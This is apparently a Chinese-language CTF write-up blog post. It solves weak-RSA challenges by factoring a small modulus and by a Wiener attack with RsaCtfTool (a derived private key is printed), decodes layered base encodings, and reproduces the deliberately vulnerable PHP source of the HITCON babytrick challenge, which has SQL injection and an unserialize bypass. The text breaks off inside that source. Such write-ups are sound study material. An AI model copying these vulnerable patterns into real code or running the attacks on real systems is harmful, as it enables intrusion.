<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="CTF," />










<meta name="description" content="RSA2基本原理:公钥与私钥的产生：(1)进行加密之前，首先找出2个不同的大质数p和q(2)计算n&#x3D;pq(3)根据欧拉函数，求得φ(n)&#x3D;φ(p)φ(q)&#x3D;(p−1)(q−1)(4)找出一个公钥e，e要满足: 1&lt;e&lt;φ(n) 的整数，且使e和φ(N)互质。(5)根据ed除以φ(n)余数为1，找到私钥d。(6)所以,公钥就是(n,e) 私钥就是(n,d) 消息加密:m^e除以n求余数即">
<meta property="og:type" content="article">
<meta property="og:title" content="RSA&amp;babyBase&amp;babyTirck初尝试">
<meta property="og:url" content="http://yoursite.com/2020/03/16/RSA-babyBase-babyTirck%E5%88%9D%E5%B0%9D%E8%AF%95/index.html">
<meta property="og:site_name" content="RichardLEE&#39;s Blog">
<meta property="og:description" content="RSA2基本原理:公钥与私钥的产生：(1)进行加密之前，首先找出2个不同的大质数p和q(2)计算n&#x3D;pq(3)根据欧拉函数，求得φ(n)&#x3D;φ(p)φ(q)&#x3D;(p−1)(q−1)(4)找出一个公钥e，e要满足: 1&lt;e&lt;φ(n) 的整数，且使e和φ(N)互质。(5)根据ed除以φ(n)余数为1，找到私钥d。(6)所以,公钥就是(n,e) 私钥就是(n,d) 消息加密:m^e除以n求余数即">
<meta property="article:published_time" content="2020-03-16T15:08:57.000Z">
<meta property="article:modified_time" content="2020-03-16T15:10:19.884Z">
<meta property="article:author" content="Richard LEE">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/03/16/RSA-babyBase-babyTirck初尝试/"/>





  <title>RSA&babyBase&babyTirck初尝试 | RichardLEE's Blog</title>
  








<meta name="generator" content="Hexo 4.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">RichardLEE's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/03/16/RSA-babyBase-babyTirck%E5%88%9D%E5%B0%9D%E8%AF%95/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Richard LEE">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="RichardLEE's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">RSA&babyBase&babyTirck初尝试</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-03-16T23:08:57+08:00">
                2020-03-16
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="RSA2"><a href="#RSA2" class="headerlink" title="RSA2"></a>RSA2</h1><h2 id="基本原理"><a href="#基本原理" class="headerlink" title="基本原理:"></a>基本原理:</h2><h3 id="公钥与私钥的产生："><a href="#公钥与私钥的产生：" class="headerlink" title="公钥与私钥的产生："></a>公钥与私钥的产生：</h3><p>(1)进行加密之前，首先找出2个不同的大质数p和q<br>(2)计算n=p<em>q<br>(3)根据欧拉函数，求得φ(n)=φ(p)φ(q)=(p−1)(q−1)<br>(4)找出一个公钥e，e要满足: 1&lt;e&lt;φ(n) 的整数，且使e和φ(N)互质。<br>(5)根据e</em>d除以φ(n)余数为1，找到私钥d。<br>(6)所以,公钥就是(n,e) 私钥就是(n,d)</p>
<h3 id="消息加密"><a href="#消息加密" class="headerlink" title="消息加密:"></a>消息加密:</h3><p>m^e除以n求余数即为c(密文)</p>
<h3 id="消息解密"><a href="#消息解密" class="headerlink" title="消息解密:"></a>消息解密:</h3><p>c^d除以n求余数即为m(明文)</p>
<h2 id="解题-RSA2"><a href="#解题-RSA2" class="headerlink" title="解题 RSA2"></a>解题 RSA2</h2><p>flag{Y0u_m4y_uNd3rstand_RSA}<br>题目给了公钥和密文我们对这个公钥提取信息：<br>可以得到</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">OpenSSL&gt; rsa -pubin -text -modulus -in &#39;&#x2F;root&#x2F;桌面&#x2F;pubkey.pem&#39; </span><br><span class="line">RSA Public-Key: (256 bit)</span><br><span class="line">Modulus:</span><br><span class="line">    00:c2:63:6a:e5:c3:d8:e4:3f:fb:97:ab:09:02:8f:</span><br><span class="line">    1a:ac:6c:0b:f6:cd:3d:70:eb:ca:28:1b:ff:e9:7f:</span><br><span class="line">    be:30:dd</span><br><span class="line">Exponent: 65537 (0x10001)</span><br><span class="line">Modulus&#x3D;C2636AE5C3D8E43FFB97AB09028F1AAC6C0BF6CD3D70EBCA281BFFE97FBE30DD</span><br><span class="line">writing RSA key</span><br><span class="line">-----BEGIN PUBLIC KEY-----</span><br><span class="line">MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAMJjauXD2OQ&#x2F;+5erCQKPGqxsC&#x2F;bNPXDr</span><br><span class="line">yigb&#x2F;+l&#x2F;vjDdAgMBAAE&#x3D;</span><br><span class="line">-----END PUBLIC KEY-----</span><br></pre></td></tr></table></figure>
<p>公钥极短，我们可以直接分解N，得到p和q<br>转换进制使用yafu可以分解n</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">N &#x3D; 87924348264132406875276140514499937145050893665602592992418171647042491658461</span><br><span class="line">E &#x3D; 65537</span><br><span class="line">P &#x3D; 275127860351348928173285174381581152299</span><br><span class="line">Q &#x3D; 319576316814478949870590164193048041239</span><br><span class="line">d &#x3D; 10866948760844599168252082612378495977388271279679231539839049698621994994673</span><br></pre></td></tr></table></figure>
<p>所有的东西都得到了而且学习了rsa原理后就写脚本直接解密吧</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">import gmpy2</span><br><span class="line">import libnum</span><br><span class="line">import string</span><br><span class="line">from Crypto.PublicKey import RSA</span><br><span class="line">from Crypto.Util.number import long_to_bytes</span><br><span class="line"></span><br><span class="line">with open(&quot;pubkey.pem&quot;, &quot;r&quot;) as f:</span><br><span class="line">	key &#x3D; RSA.importKey(f)</span><br><span class="line">	n &#x3D; key.n</span><br><span class="line">	e &#x3D; key.e</span><br><span class="line"></span><br><span class="line">p&#x3D;275127860351348928173285174381581152299</span><br><span class="line">q&#x3D;319576316814478949870590164193048041239</span><br><span class="line"></span><br><span class="line">d &#x3D; libnum.invmod(e,(p-1)*(q-1))</span><br><span class="line">with open(&#39;flag.encrypt&#39;,&#39;r&#39;) as f:</span><br><span class="line">    c &#x3D; f.read().encode(&#39;hex&#39;)</span><br><span class="line">    c &#x3D; int(c,16)</span><br><span class="line">m &#x3D; pow(c,d,n)</span><br><span class="line">print long_to_bytes(m)</span><br></pre></td></tr></table></figure>


<h2 id="Wiener-Tricky"><a href="#Wiener-Tricky" class="headerlink" title="Wiener Tricky"></a>Wiener Tricky</h2><p>flag{Y0u_9ot_th3_w1ener_t7icky!}<br>题目给出rsa公钥和密文文件。<br>按照常规查看提取一下公钥文件，发现n特别大，无法直接分解，而且e也不存在是特殊值的可能，也不存在其他的攻击方法，只能考虑”根据公钥计算得到私钥的方法”了.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">openssl rsa -pubin -text -modulus -in pub.key</span><br><span class="line">RSA Public-Key: (1027 bit)</span><br><span class="line">Modulus:</span><br><span class="line">    05:48:47:d1:37:df:84:09:76:36:94:33:18:d2:f7:</span><br><span class="line">    9d:1d:ea:29:c3:a5:c6:e2:96:0e:5b:45:1c:7a:0e:</span><br><span class="line">    58:60:ba:82:e9:43:52:fe:96:3f:ff:e6:f4:f4:d8:</span><br><span class="line">    2a:c4:ce:ea:97:7c:1d:42:5f:1d:32:a5:8a:04:98:</span><br><span class="line">    98:b1:ce:5e:60:2c:49:4d:71:6e:56:11:60:52:fd:</span><br><span class="line">    d4:64:71:c7:40:c1:2e:b8:b2:45:f0:55:8b:6d:50:</span><br><span class="line">    cc:0c:1f:20:c2:c0:1e:e9:b6:89:c4:bb:6b:6b:52:</span><br><span class="line">    78:d1:e6:3b:d2:c7:a5:d1:56:17:38:21:6d:1a:cf:</span><br><span class="line">    96:e2:42:0b:e4:20:84:29:6b</span><br><span class="line">Exponent:</span><br><span class="line">    01:fa:e3:89:1f:41:0b:09:a6:68:8a:75:b8:d5:e1:</span><br><span class="line">    a0:4a:5d:5d:8b:02:04:83:73:9f:93:c3:38:68:75:</span><br><span class="line">    5e:97:0e:c9:8d:6b:5f:4a:37:26:88:e1:e6:00:6f:</span><br><span class="line">    2e:d3:4d:84:8c:5c:cc:7f:c0:3a:e4:a1:9a:d9:ba:</span><br><span class="line">    62:22:8d:75:d8:09:1f:db:58:e1:64:8d:3b:af:46:</span><br><span class="line">    d2:28:b5:4f:5e:f9:db:24:79:ba:85:ce:fd:41:8a:</span><br><span class="line">    42:67:1a:d3:8b:12:35:e6:b0:41:66:38:1b:e3:b6:</span><br><span class="line">    59:42:46:3c:10:93:53:e4:d1:a6:52:bc:c0:1f:40:</span><br><span class="line">    86:c6:72:19:08:f6:ab:c2:13</span><br><span class="line">Modulus&#x3D;54847D137DF84097636943318D2F79D1DEA29C3A5C6E2960E5B451C7A0E5860BA82E94352FE963FFFE6F4F4D82AC4CEEA977C1D425F1D32A58A049898B1CE5E602C494D716E56116052FDD46471C740C12EB8B245F0558B6D50CC0C1F20C2C01EE9B689C4BB6B6B5278D1E63BD2C7A5D1561738216D1ACF96E2420BE42084296B</span><br><span class="line">writing RSA key</span><br><span class="line">-----BEGIN PUBLIC KEY-----</span><br><span class="line">MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKBgQVIR9E334QJdjaUMxjS950d</span><br><span class="line">6inDpcbilg5bRRx6DlhguoLpQ1L+lj&#x2F;&#x2F;5vT02CrEzuqXfB1CXx0ypYoEmJixzl5g</span><br><span class="line">LElNcW5WEWBS&#x2F;dRkccdAwS64skXwVYttUMwMHyDCwB7ptonEu2trUnjR5jvSx6XR</span><br><span class="line">Vhc4IW0az5biQgvkIIQpawKBgQH644kfQQsJpmiKdbjV4aBKXV2LAgSDc5+Twzho</span><br><span class="line">dV6XDsmNa19KNyaI4eYAby7TTYSMXMx&#x2F;wDrkoZrZumIijXXYCR&#x2F;bWOFkjTuvRtIo</span><br><span class="line">tU9e+dskebqFzv1BikJnGtOLEjXmsEFmOBvjtllCRjwQk1Pk0aZSvMAfQIbGchkI</span><br><span class="line">9qvCEw&#x3D;&#x3D;</span><br><span class="line">-----END PUBLIC KEY-----</span><br></pre></td></tr></table></figure>
<h4 id="使用RSACtfTool根据公钥计算私钥"><a href="#使用RSACtfTool根据公钥计算私钥" class="headerlink" title="使用RSACtfTool根据公钥计算私钥"></a>使用RSACtfTool根据公钥计算私钥</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">python RsaCtfTool.py --publickey pub.key --private</span><br><span class="line">-----BEGIN RSA PRIVATE KEY-----</span><br><span class="line">MIICOQIBAAKBgQVIR9E334QJdjaUMxjS950d6inDpcbilg5bRRx6DlhguoLpQ1L+</span><br><span class="line">lj&#x2F;&#x2F;5vT02CrEzuqXfB1CXx0ypYoEmJixzl5gLElNcW5WEWBS&#x2F;dRkccdAwS64skXw</span><br><span class="line">VYttUMwMHyDCwB7ptonEu2trUnjR5jvSx6XRVhc4IW0az5biQgvkIIQpawKBgQH6</span><br><span class="line">44kfQQsJpmiKdbjV4aBKXV2LAgSDc5+TwzhodV6XDsmNa19KNyaI4eYAby7TTYSM</span><br><span class="line">XMx&#x2F;wDrkoZrZumIijXXYCR&#x2F;bWOFkjTuvRtIotU9e+dskebqFzv1BikJnGtOLEjXm</span><br><span class="line">sEFmOBvjtllCRjwQk1Pk0aZSvMAfQIbGchkI9qvCEwIgP0SHKLEp0jgflZ8HdAiJ</span><br><span class="line">UfvE+hz7xus3gBRELOG5amMCQQHrYYLEbDl4PVMSO&#x2F;Ro2qNYJmbjaoh0lqb919o4</span><br><span class="line">UGnrX27XtD7jpVeyd6RbzALkc7uLd&#x2F;XYposNh2KgF5MzkC0XAkECwIMcgL&#x2F;kL+Wc</span><br><span class="line">RD8VSTF3VKTvF4T4ji6afBNgaHxePtSBajMsmRgpk+kE11c0fXFOs4a&#x2F;KXFLXJRO</span><br><span class="line">gW9qCmUizQIgP0SHKLEp0jgflZ8HdAiJUfvE+hz7xus3gBRELOG5amMCID9Ehyix</span><br><span class="line">KdI4H5WfB3QIiVH7xPoc+8brN4AURCzhuWpjAkADEBs9xgVMCqDk4PonQLmwrd4m</span><br><span class="line">XiTo3nyu3KIK7avUMS92QvGYO8Di7J0C1Vknnh1rbsh1tcM4v9MUeXtVJZhi</span><br><span class="line">-----END RSA PRIVATE KEY-----</span><br></pre></td></tr></table></figure>
<h4 id="使用openssl根据公钥和私钥解开密文文件"><a href="#使用openssl根据公钥和私钥解开密文文件" class="headerlink" title="使用openssl根据公钥和私钥解开密文文件"></a>使用openssl根据公钥和私钥解开密文文件</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">openssl rsautl -decrypt -inkey pri.key -in flag.enc -out txt</span><br></pre></td></tr></table></figure>
<p>查看out.txt得到flag.</p>
<h1 id="misc-BabyBase"><a href="#misc-BabyBase" class="headerlink" title="misc BabyBase"></a>misc BabyBase</h1><p>打开文件，全是数字，看起来像base16，直接写个脚本解密：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">#coding:utf-8</span><br><span class="line">import base64</span><br><span class="line"></span><br><span class="line">fb &#x3D; open(&#39;base.txt&#39;,&#39;r&#39;)</span><br><span class="line">txt &#x3D; fb.readlines()[0]</span><br><span class="line">while True:</span><br><span class="line">        try:</span><br><span class="line">            txt &#x3D; base64.b16decode(txt)</span><br><span class="line">        except Exception as e:</span><br><span class="line">            try:</span><br><span class="line">                txt &#x3D; base64.b32decode(txt)</span><br><span class="line">            except Exception as e:</span><br><span class="line">                txt &#x3D; base64.b64decode(txt)</span><br><span class="line">        finally:</span><br><span class="line">            print txt</span><br><span class="line">f.close()</span><br></pre></td></tr></table></figure>
<p>flag{Y0u_4re_A_g0od_Bas3_H444ndler:3}</p>
<h1 id="web-babytrick"><a href="#web-babytrick" class="headerlink" title="web babytrick"></a>web babytrick</h1><p>给了源代码，分析一下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"> </span><br><span class="line">include &quot;config.php&quot;;</span><br><span class="line"> </span><br><span class="line">class HITCON&#123;</span><br><span class="line">    private $method;</span><br><span class="line">    private $args;</span><br><span class="line">    private $conn;</span><br><span class="line">    &#x2F;&#x2F;私有类型:该类型的属性或方法只能在该类中使用，在该类的实例、子类中、子类的实例中都不能调用私有类型的属性和方法</span><br><span class="line"> </span><br><span class="line">    public function __construct($method, $args) &#123;</span><br><span class="line">    &#x2F;&#x2F;__construct:当使用 new 操作符创建一个类的实例时，构造方法将会自动调用</span><br><span class="line">        $this-&gt;method &#x3D; $method;</span><br><span class="line">        $this-&gt;args &#x3D; $args;</span><br><span class="line"> </span><br><span class="line">        $this-&gt;__conn();</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    function show() &#123;</span><br><span class="line">        list($username) &#x3D; func_get_args();&#x2F;&#x2F;func_get_args()返回一个包含函数参数列表的数组,即传入show()函数的参数</span><br><span class="line">        $sql &#x3D; sprintf(&quot;SELECT * FROM users WHERE username&#x3D;&#39;%s&#39;&quot;, $username);</span><br><span class="line">        &#x2F;&#x2F;sprintf()把百分号（%）符号替换成一个作为参数进行传递的变量</span><br><span class="line"> </span><br><span class="line">        $obj &#x3D; $this-&gt;__query($sql);</span><br><span class="line">        if ( $obj !&#x3D; false  ) &#123;</span><br><span class="line">            $this-&gt;__die( sprintf(&quot;%s is %s&quot;, $obj-&gt;username, $obj-&gt;role) );</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            $this-&gt;__die(&quot;Nobody Nobody But You!&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">        </span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    function login() &#123;</span><br><span class="line">        global $FLAG;</span><br><span class="line">        list($username, $password) &#x3D; func_get_args();</span><br><span class="line">        $username &#x3D; strtolower(trim(mysql_escape_string($username)));&#x2F;&#x2F;strtolower()转小写trim()去空格mysql_escape_string()转义在 SQL 语句中使用的字符串中的特殊字符。</span><br><span class="line">        $password &#x3D; strtolower(trim(mysql_escape_string($password)));</span><br><span class="line"> </span><br><span class="line">        $sql &#x3D; sprintf(&quot;SELECT * FROM users WHERE username&#x3D;&#39;%s&#39; AND password&#x3D;&#39;%s&#39;&quot;, $username, $password);</span><br><span class="line">        if ( $username &#x3D;&#x3D; &#39;orange&#39; || stripos($sql, &#39;orange&#39;) !&#x3D; false ) &#123;                &#x2F;&#x2F;特殊字符Ã绕过;</span><br><span class="line">        &#x2F;&#x2F;stripos() 函数查找字符串在另一字符串中第一次出现的位置（不区分大小写）</span><br><span class="line">            $this-&gt;__die(&quot;Orange is so shy. He do not want to see you.&quot;);</span><br><span class="line">        &#125;</span><br><span class="line"> </span><br><span class="line">        $obj &#x3D; $this-&gt;__query($sql);</span><br><span class="line">        if ( $obj !&#x3D; false &amp;&amp; $obj-&gt;role &#x3D;&#x3D; &#39;admin&#39;  ) &#123;</span><br><span class="line">            $this-&gt;__die(&quot;Hi, Orange! Here is your flag: &quot; . $FLAG);</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            $this-&gt;__die(&quot;Admin only!&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    function source() &#123;</span><br><span class="line">        highlight_file(__FILE__);</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    function __conn() &#123;</span><br><span class="line">        global $db_host, $db_name, $db_user, $db_pass, $DEBUG;</span><br><span class="line"> </span><br><span class="line">        if (!$this-&gt;conn)</span><br><span class="line">            $this-&gt;conn &#x3D; mysql_connect($db_host, $db_user, $db_pass);</span><br><span class="line">        mysql_select_db($db_name, $this-&gt;conn);</span><br><span class="line"> </span><br><span class="line">        if ($DEBUG) &#123;</span><br><span class="line">            $sql &#x3D; &quot;CREATE TABLE IF NOT EXISTS users ( </span><br><span class="line">                        username VARCHAR(64), </span><br><span class="line">                        password VARCHAR(64), </span><br><span class="line">                        role VARCHAR(64)</span><br><span class="line">                    ) CHARACTER SET utf8&quot;;</span><br><span class="line">            $this-&gt;__query($sql, $back&#x3D;false);</span><br><span class="line"> </span><br><span class="line">            $sql &#x3D; &quot;INSERT INTO users VALUES (&#39;orange&#39;, &#39;$db_pass&#39;, &#39;admin&#39;), (&#39;phddaa&#39;, &#39;ddaa&#39;, &#39;user&#39;)&quot;;</span><br><span class="line">            $this-&gt;__query($sql, $back&#x3D;false);</span><br><span class="line">        &#125; </span><br><span class="line"> </span><br><span class="line">        mysql_query(&quot;SET names utf8&quot;);                          &#x2F;&#x2F;使用utf8编码方式</span><br><span class="line">        mysql_query(&quot;SET sql_mode &#x3D; &#39;strict_all_tables&#39;&quot;);&#x2F;&#x2F;严格模式</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    function __query($sql, $back&#x3D;true) &#123;</span><br><span class="line">        $result &#x3D; @mysql_query($sql);&#x2F;&#x2F;mysql_query() 函数执行一条 MySQL 查询。</span><br><span class="line">        if ($back) &#123;</span><br><span class="line">            return @mysql_fetch_object($result);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    function __die($msg) &#123;</span><br><span class="line">        $this-&gt;__close();</span><br><span class="line"> </span><br><span class="line">        header(&quot;Content-Type: application&#x2F;json&quot;);</span><br><span class="line">        die( json_encode( array(&quot;msg&quot;&#x3D;&gt; $msg) ) );</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    function __close() &#123;</span><br><span class="line">        mysql_close($this-&gt;conn);</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    function __destruct() &#123;</span><br><span class="line">        $this-&gt;__conn();             &#x2F;&#x2F;将数据写入数据库；</span><br><span class="line"> </span><br><span class="line">        if (in_array($this-&gt;method, array(&quot;show&quot;, &quot;login&quot;, &quot;source&quot;))) &#123;</span><br><span class="line">            @call_user_func_array(array($this, $this-&gt;method), $this-&gt;args);</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            $this-&gt;__die(&quot;What do you do?&quot;);</span><br><span class="line">        &#125;</span><br><span class="line"> </span><br><span class="line">        $this-&gt;__close();</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    function __wakeup() &#123;</span><br><span class="line">        foreach($this-&gt;args as $k &#x3D;&gt; $v) &#123;</span><br><span class="line">            $this-&gt;args[$k] &#x3D; strtolower(trim(mysql_escape_string($v)));</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">if(isset($_GET[&quot;data&quot;])) &#123;                        &#x2F;&#x2F;侦测有无data的get获取；</span><br><span class="line">    @unserialize($_GET[&quot;data&quot;]);                  &#x2F;&#x2F;跳过 __wakeup()函数；调用析构函数</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    new HITCON(&quot;source&quot;, array());</span><br><span class="line">&#125;</span><br><span 